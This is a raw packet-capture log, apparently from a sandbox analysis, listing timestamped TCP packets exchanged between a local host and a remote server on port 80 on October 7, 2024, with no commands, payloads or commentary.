Oct 7, 2024 03:15:44.358423948 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358423948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358453989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358457088 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358472109 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358488083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358521938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358534098 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358552933 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358568907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358587027 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358608961 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358620882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358635902 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358654022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358665943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358685970 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358700991 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358719110 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358731031 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358751059 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358763933 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358783960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358798027 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358815908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358828068 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358848095 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358860016 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358880043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358892918 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358911991 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358923912 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358946085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358957052 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358979940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358992100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.359009027 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.359025955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.359040022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.359052896 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.359074116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.359083891 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.359107018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.359121084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.359139919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.359149933 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.359173059 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.359186888 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.359206915 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.359220028 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.359240055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.359255075 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.359272957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.359287024 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.359304905 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.359319925 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.359338999 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.359354019 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.359370947 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.359396935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.359421015 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.359421015 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.359452963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.359468937 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.359488010 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.359500885 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.359534979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.451348066 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.451365948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.451395035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.451467037 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.451483965 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.451498985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.451515913 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.451607943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.451608896 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.452619076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.452651024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.452666998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.452685118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.452717066 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.452728033 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.452730894 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.452744961 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.452760935 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.452778101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.452785015 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.452811956 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.452825069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.452841043 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.452843904 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.452861071 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.452871084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.452884912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.452913046 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.452933073 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.452936888 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.452936888 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.452953100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.452954054 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.452974081 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.453402042 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453454018 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.453497887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453514099 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453530073 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453543901 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.453543901 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453557968 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.453561068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453573942 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.453588963 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.453588963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453603983 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.453604937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453633070 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.453634024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453649998 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.453649998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453665972 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453679085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.453684092 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453694105 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.453711033 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.453711987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453726053 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.453727961 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453743935 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453753948 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.453759909 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453777075 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.453787088 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453787088 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.453804016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453808069 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.453819036 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453826904 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.453836918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453845978 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.453854084 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453864098 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.453871012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453887939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453901052 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.453912973 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.453933954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453950882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453962088 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.453967094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453985929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.453988075 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.454000950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.454004049 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.454018116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.454031944 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.454032898 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.454050064 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.454060078 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.454065084 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.454077959 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.454082012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.454097033 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.454111099 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.454138994 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.454499006 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.454591036 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.454606056 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.454622984 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.454639912 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.454641104 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.454652071 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.454668999 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.454685926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.454696894 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.454701900 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.454710007 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.454726934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.454732895 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.454751968 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.454757929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.454766989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.454806089 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.454804897 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.454837084 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.454857111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.454866886 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.454890013 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.454899073 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.454911947 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.454929113 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.454942942 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.454972982 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.454983950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.455029964 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.455030918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.455061913 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.455082893 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.455091953 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.455111027 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.455123901 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.455142021 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.455151081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.455173969 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.455182076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.455204010 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.455214024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.455229998 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.455243111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.455260038 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.455274105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.455293894 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.455303907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.455322981 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.455334902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.455352068 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.455365896 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.455390930 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.455423117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.457695007 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.457726002 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.457767010 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.457787991 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.457798958 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.457802057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.457820892 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.457850933 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.457853079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.457901001 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.457918882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.457967043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.457969904 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.457998037 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.458017111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.458029032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.458050966 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.458059072 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.458077908 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.458092928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.458125114 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.458127022 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.458161116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.458162069 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.458185911 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.458190918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.458205938 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.458239079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.458256006 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.458268881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.458292007 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.458300114 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.458319902 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.458336115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.458350897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.458376884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.458383083 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.458408117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.458425045 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.458440065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.458458900 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.458468914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.458494902 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.458501101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.458520889 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.458529949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.458551884 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.458559990 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.458580017 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.458592892 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.458611012 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.458625078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.458642006 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.458652020 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.458673000 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.458698988 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.553101063 CEST	443	49863	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.554456949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.554472923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.554487944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.554503918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.554522038 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.554558039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.554574013 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.554600000 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.554616928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.554631948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.554646015 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.554651022 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.554662943 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.554680109 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.554693937 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.554697037 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.554721117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.554754972 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.554768085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.554775000 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.554790974 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.554806948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.554822922 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.554822922 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.554838896 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.554872036 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.554872036 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.554888964 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.554903984 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.554920912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.554932117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.554935932 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.554956913 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.554959059 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.554986954 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.554990053 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.555020094 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.555047035 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.555048943 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.555100918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.555154085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.555155993 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.555188894 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.555205107 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.555222988 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.555234909 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.555252075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.555288076 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.555299997 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.555310011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.555363894 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.555365086 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.555413961 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.555433989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.555484056 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.555490017 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.555521011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.555536032 CEST	49782	80	192.168.2.5	95.164.90.97
